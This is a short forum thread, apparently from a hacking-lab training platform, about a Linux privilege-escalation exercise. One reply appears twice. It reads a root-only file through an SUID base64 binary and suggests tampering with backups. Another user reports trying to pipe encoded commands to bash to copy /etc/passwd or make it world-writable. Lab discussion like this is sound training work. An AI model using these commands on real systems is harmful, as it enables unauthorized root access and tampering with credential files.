Forum Discussion
Privilege Escalation: Linux – Demonstrate Your Skills
- 2 months ago
hmm.. on FILE_SRV-DEV you should just execute base64 and the file you want to see.
with SUID rights you'll see the content (as base64) so just revert it :)merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d
Privilege Escalation Completed -- FILE-SRV-DEV ✅
once you did this try to figure out how the server gets backuped and how you can interfere.
hmm.. on FILE_SRV-DEV you should just execute base64 and the file you want to see.
with SUID rights you'll see the content (as base64) so just revert it :)
merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d
Privilege Escalation Completed -- FILE-SRV-DEV ✅
once you did this try to figure out how the server gets backuped and how you can interfere.
- gwenael2 months ago
Bronze II
Thank you Steven,
Simpler than I was trying and doesn’t work 🙂
echo "cmd" | base64 (with cmd= cp /etc/passwd /tmp/passwd or chmod 777 /etc/passwd etc …)
echo hashcmd | base64 -d | bash